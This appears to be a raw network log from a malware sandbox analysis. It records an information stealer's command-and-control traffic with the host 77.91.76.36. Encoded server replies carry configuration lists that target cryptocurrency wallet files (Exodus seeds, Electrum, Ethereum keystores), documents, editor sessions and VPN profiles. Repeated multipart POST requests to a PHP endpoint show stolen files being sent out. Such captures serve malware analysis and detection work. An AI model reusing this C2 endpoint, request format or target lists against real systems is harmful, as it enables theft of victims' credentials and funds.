47 5a 70 62 47 56 66 58 7a 41 75 62 47 39 6a 59 57 78 7a 64 47 39 79 59 57 64 6c 66 44 42 38 53 6d 46 34 65 43 42 45 5a 58 4e 72 64 47 39 77 66 46 78 6a 62 32 30 75 62 47 6c 69 5a 58 4a 30 65 53 35 71 59 58 68 34 58 45 6c 75 5a 47 56 34 5a 57 52 45 51 6c 78 6d 61 57 Data Ascii: Qml0Y29pbiBDb3JlfFxCaXRjb2luXHdhbGxldHNcfHdhbGxldC5kYXR8MXxCaXRjb2luIENvcmUgT2xkfFxCaXRjb2luXHwqd2FsbGV0Ki5kYXR8MHxEb2dlY29pbnxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8XFJhdmVuXHwqd2FsbGV0Ki5kYXR8MHxEYWVkYWx1cyBNYWlubmV0fFxEYWVkYWx1cyBNYWlubmV0XHdhbGxldHNcfHNoZSouc3FsaXRlfDB8QmxvY2tzdHJlYW0gR3JlZW58XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8XFdhbGxldFdhc2FiaVxDbGllbnRcV2FsbGV0c1x8Ki5qc29ufDB8RXRoZXJldW18XEV0aGVyZXVtXHxrZXlzdG9yZXwwfEVsZWN0cnVtfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3xcRWxlY3RydW0tTFRDXHdhbGxldHNcfCouKnwwfEV4b2R1c3xcRXhvZHVzXHxleG9kdXMuY29uZi5qc29ufDB8RXhvZHVzfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8cGFzc3BocmFzZS5qc29ufDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8c2VlZC5zZWNvfDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHxcRWxlY3Ryb25DYXNoXHdhbGxldHNcfCouKnwwfE11bHRpRG9nZXxcTXVsdGlEb2dlXHxtdWx0aWRvZ2Uud2FsbGV0fDB8SmF4eCBEZXNrdG9wIChvbGQpfFxqYXh4XExvY2FsIFN0b3JhZ2VcfGZpbGVfXzAubG9jYWxzdG9yYWdlfDB8SmF4eCBEZXNrdG9wfFxjb20ubGliZXJ0eS5qYXh4XEluZGV4ZWREQlxmaW
Dec 24, 2023 10:45:08.294303894 CET	463	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF Host: 77.91.76.36 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="message"files------GHJKECAAAFHJECAAAEBF--
Dec 24, 2023 10:45:08.688168049 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU
Dec 24, 2023 10:45:08.764422894 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHJKKFBAEGDGDGCBKEC Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:09.524606943 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:09.530282974 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:10.174583912 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:10.181896925 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDB Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:10.775553942 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:10.780539989 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJE Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:11.536783934 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:11.556654930 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCF Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:12.347907066 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:12.360457897 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCG Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:13.075270891 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:13.083359957 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBA Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:13.666735888 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:13.678335905 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGI Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:14.435276031 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:14.452502012 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCGCAAKJDHJJJJJKKKFB Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:15.127187014 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:15.235598087 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCB Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:16.031882048 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:17.030625105 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKE Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:17.761092901 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:17.778862953 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHJKKFBAEGDGDGCBKEC Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:18.650417089 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:18.657452106 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHC Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:19.524182081 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:19.529829979 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:20.504954100 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:20.525477886 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:21.364326954 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:21.378209114 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:22.270931005 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:22.389441013 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:22.984648943 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:22.991096020 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHD Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:23.702591896 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:23.725096941 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCB Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:24.555389881 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:24.567276955 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJDAFBKFHIDGCFBFC Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:25.257302999 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:25.267769098 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEH Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:26.001930952 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:26.007755995 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKE Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:26.825716019 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:26.843488932 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIIEHJKKECGCBFIIJDA Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:27.488614082 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:27.524563074 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:28.301199913 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:28.308346033 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJD Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:29.169663906 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:29.176413059 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDB Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:30.089097023 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:30.101816893 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:30.766750097 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:30.782532930 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJE Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:31.483239889 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:31.497329950 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDG Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:32.387871981 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:32.405122042 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:33.115335941 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:33.137234926 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDH Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:33.983866930 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:34.000283003 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHD Host: 77.91.76.36 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:34.734869957 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:34.747560024 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAK Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:35.718393087 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:35.731663942 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCB Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:36.569190979 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:36.577014923 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJDAFBKFHIDGCFBFC Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:37.506248951 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
